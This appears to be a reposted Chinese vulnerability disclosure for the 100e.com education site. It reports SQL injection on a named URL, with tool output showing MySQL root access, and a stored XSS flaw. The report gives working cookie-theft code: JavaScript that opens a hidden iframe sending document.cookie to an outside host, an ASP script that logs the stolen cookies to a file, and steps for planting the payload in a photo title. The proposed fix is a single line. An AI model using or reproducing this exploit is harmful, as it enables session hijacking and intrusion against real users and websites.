伪静态注入
直接丢Havjj里
http://xyz.edudemo.100e.com/paperdetail.aspx?id=1075
都存在注入,皆为root。
Powered-by: ASP.NET
DB Server: MySQL error based
Resp. Time(avg):306 ms
Sql Version: 5.1.41-log
Current DB: 100eDB
Host Name: localhost.localdomain
Installation dir: /usr/local/ mysql /
DB User & Pass: root::localhost
http://www.100e.com/ 进入首页即可触发XSS 测试可以无声无息的盗取了cookie ,应该还可以融虫吧,表示没试过
利用:
在个人管理里面选择上传照片 然后照片随便 标题就写 XSS代码 这次测试的是 盗取 cookie
JS代码
var str=escape(window.location.pathname);
cv=escape(document.cookie);
function f()
{
ifm=document.createElement("IFRAME");
document.body.appendChild(ifm);
ifm.width=0;
ifm.height=0;
ifm.src="http://www.xxxx.com/1.asp?s="+str+"|"+cv;
}
setTimeout(f,"1000");
ASP代码
<%
s=request("s")
if s <> "" then
set fso=Server.CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(server.mappath("1.txt"),8,true)
.writeline s
.close
End with
end if
%>
触发后会在当前目录生成1.txt并把截取到的cookie放进去
然后在照片标题处写 <script src=http://xxxxxxxxx.com/1.js>
保存
这时再打开首页 会和往常一样正常,不过你的cookie已经被截取了,发往了某网站空间里面的1.txt文件里
修复方案: 过滤一下关键字
查看更多关于100e两个注入一个XSS - 网站安全 - 自学php的详细内容...